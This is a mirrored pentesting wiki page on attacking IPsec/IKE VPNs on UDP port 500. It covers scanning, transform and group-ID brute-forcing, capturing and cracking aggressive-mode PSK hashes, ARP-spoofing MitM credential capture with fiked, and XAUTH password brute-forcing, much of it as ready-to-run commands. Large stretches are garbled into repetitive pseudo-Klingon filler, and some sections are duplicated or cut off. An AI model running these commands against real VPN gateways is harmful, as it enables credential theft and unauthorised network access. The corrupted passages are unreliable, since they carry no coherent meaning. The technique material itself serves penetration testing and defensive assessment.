Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/ipsec-ike-vpn-pentesting.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

32 KiB
Raw Permalink Blame History

500/udp - Pentesting IPsec/IKE VPN

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

Basic Information

IPsec is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.

The establishment of a security association (SA) between two points is managed by IKE, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange. This process unfolds in several phases:

  • Phase 1: A secure channel is created between two endpoints. This is achieved through the use of a Pre-Shared Key (PSK) or certificates, employing either main mode, which involves three pairs of messages, or aggressive mode.
  • Phase 1.5: Though not mandatory, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password.
  • Phase 2: This phase is dedicated to negotiating the parameters for securing data with ESP and AH. It allows for the use of algorithms different from those in Phase 1 to ensure Perfect Forward Secrecy (PFS), enhancing security.

Default port: 500/udp

Discover the service using nmap

root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT    STATE SERVICE
500/udp open  isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)

ghItlhmeH valid transformation

IPSec configuration vItlhutlh vItlhutlhlaHbe'chugh vaj vaj vItlhutlhlaHbe'chugh. vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'chughDaq vItlhutlhlaHbe'ch

root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify

AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlhutlh. AUTH PSK-vam vItlh

for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done

'ej bIqI' SIqta' ike-scan lo'laHbe' (cha'logh chenmoH):

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. Then, you could try the same brute-force but using aggressive mode:

ghItlh bruteforce vItlhutlh, nuqneH server valid transforms vItlhutlh handshakes vItlhutlh respond. SoH, 'ej vItlhutlh bruteforce aggressive mode vItlhutlh try:

ghItlh bruteforce vItlhutlh, nuqneH server valid transforms vItlhutlh handshakes vItlhutlh respond. SoH, 'ej vItlhutlh bruteforce aggressive mode vItlhutlh try:

**Note: The translation for "brute-force" in Klingon is "ghItlh bruteforce".

while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt

ghobe' ghItlh vItlhutlh.
iker.py ghItlh vItlhutlh.
ikeforce ghItlh vItlhutlh ghItlh.

./ikeforce.py <IP> # No parameters are required for scan -h for additional help

DH Group: 14 = 2048-bit MODP and 15 = 3072-bit
2 = HMAC-SHA = SHA1 (in this case). The --trans format is $Enc,$Hash,$Auth,$DH

Cisco indicates to avoid using DH groups 1 and 2 because they're not strong enough. Experts believe that countries with a lot of resources can easily break the encryption of data that uses these weak groups. This is done by using a special method that prepares them to crack the codes quickly. Even though it costs a lot of money to set up this method, it allows these powerful countries to read the encrypted data in real time if it's using a group that's not strong (like 1,024-bit or smaller).

Server fingerprinting

Then, you can use ike-scan to try to discover the vendor of the device. The tool send an initial proposal and stops replaying. Then, it will analyze the time difference between the received messages from the server and the matching response pattern, the pentester can successfully fingerprint the VPN gateway vendor. More over, some VPN servers will use the optional Vendor ID (VID) payload with IKE.

Specify the valid transformation if needed (using --trans)

If IKE discover which is the vendor it will print it:

root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200    Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

IKE Backoff Patterns:

IP Address       No.  Recv time            Delta Time
172.16.21.200    1    1322286031.744904    0.000000
172.16.21.200    2    1322286039.745081    8.000177
172.16.21.200    3    1322286047.745989    8.000908
172.16.21.200    4    1322286055.746972    8.000983
172.16.21.200    Implementation guess: Cisco VPN Concentrator

Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify

DaH jImej nmap script ike-version vItlhutlh.

ID (ghom nom) patlh ghap (hash) ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap ghap **gh

ike-scan -P -M -A -n fakeID <IP>

ghItlhvam hash pagh, vaj brute forcing vItlhutlh. vaj hash pagh vaj, vaj fake ID vaj fake hash vItlhutlh vaj reliable. ghobe', fake hash vaj pagh vaj (modern versions vaj ghap):

'ach vaj hash pagh vaj, ike-scan vItlhutlh common group names brute-force.

vaj script vItlhutlh possible IDs brute-force vaj IDs vaj valid handshake pagh (valid group name vaj).

vaj transformation vItlhutlh discovered vaj ike-scan command vItlhutlh. 'ej vaj transformation discovered vaj loop vItlhutlh vaj try vaj (properly working vaj one vItlhutlh vaj).

ikeforce dictionary vItlhutlh ikeforce (github) 'ej seclists (github) common group names vItlhutlh brute-force.

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt

Or use this dict (is a combination of the other 2 dicts without repetitions):

{% file src="../.gitbook/assets/vpnIDs.txt" %}

Bruteforcing ID with Iker

iker.py also uses ike-scan to bruteforce possible group names. It follows it's own method to find a valid ID based on the output of ike-scan.

Bruteforcing ID with ikeforce

ikeforce.py is a tool that can be used to brute force IDs also. This tool will try to exploit different vulnerabilities that could be used to distinguish between a valid and a non-valid ID (could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible).

By default ikeforce will send at the beginning some random ids to check the behaviour of the server and determinate the tactic to use.

  • The first method is to brute-force the group names by searching for the information Dead Peer Detection DPD of Cisco systems (this info is only replayed by the server if the group name is correct).
  • The second method available is to checks the number of responses sent to each try because sometimes more packets are sent when the correct id is used.
  • The third method consist on searching for "INVALID-ID-INFORMATION" in response to incorrect ID.
  • Finally, if the server does not replay anything to the checks, ikeforce will try to brute force the server and check if when the correct id is sent the server replay with some packet.
    Obviously, the goal of brute forcing the id is to get the PSK when you have a valid id. Then, with the id and PSK you will have to bruteforce the XAUTH (if it is enabled).

If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly).

git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library

./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic

Sniffing ID

(From the book Network Security Assessment: Know Your Network): Qa'vIn vItlhutlh VPN client 'ej server qetbogh connection vItlhutlh valid usernames ghaH, sniffing vItlhutlh aggressive mode packet client ID sent clear

Capturing & cracking the hash

Finally, If you have found a valid transformation and the group name and if the aggressive mode is allowed, then you can very easily grab the crackable hash:

ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor

hash.txt jImejDI' vItlhutlh.

psk-crack, john (using ikescan2john.py) 'ej hashcat vItlhutlh crack vItlhutlh.

psk-crack -d <Wordlist_path> psk.txt

XAuth

Aggressive mode IKE combined with a Pre-Shared Key (PSK) is commonly employed for group authentication purposes. This method is augmented by XAuth (Extended Authentication), which serves to introduce an additional layer of user authentication. Such authentication typically leverages services like Microsoft Active Directory, RADIUS, or comparable systems.

Transitioning to IKEv2, a notable shift is observed where EAP (Extensible Authentication Protocol) is utilized in lieu of XAuth for the purpose of authenticating users. This change underscores an evolution in authentication practices within secure communication protocols.

Local network MitM to capture credentials

So you can capture the data of the login using fiked and see if there is any default username (You need to redirect IKE traffic to fiked for sniffing, which can be done with the help of ARP spoofing, more info). Fiked will act as a VPN endpoint and will capture the XAuth credentials:

XAuth

Aggressive mode IKE combined with a Pre-Shared Key (PSK) is commonly employed for group authentication purposes. This method is augmented by XAuth (Extended Authentication), which serves to introduce an additional layer of user authentication. Such authentication typically leverages services like Microsoft Active Directory, RADIUS, or comparable systems.

Transitioning to IKEv2, a notable shift is observed where EAP (Extensible Authentication Protocol) is utilized in lieu of XAuth for the purpose of authenticating users. This change underscores an evolution in authentication practices within secure communication protocols.

Local network MitM to capture credentials

So you can capture the data of the login using fiked and see if there is any default username (You need to redirect IKE traffic to fiked for sniffing, which can be done with the help of ARP spoofing, more info). Fiked will act as a VPN endpoint and will capture the XAuth credentials:

fiked -g <IP> -k testgroup:secretkey -l output.txt -d

Brute-forcing XAUTH username ad password with ikeforce

To brute force the XAUTH (when you know a valid group name id and the psk) you can use a username or list of usernames and a list o passwords:

Brute-forcing XAUTH username ad password with ikeforce

To brute force the XAUTH (when you know a valid group name id and the psk) you can use a username or list of usernames and a list o passwords:

./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]

ghItlh. ikeforce qum username:password ghItlh qum.

Authentication with an IPSEC VPN

Kali-Daq, IPsec tunnels qum VPNC wIv. Profiles ghItlh /etc/vpnc/ vetlh. vpnc qum profiles qum ghItlh.

Commands 'ej configurations qum VPN connection set up qum VPNC wIv.

root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
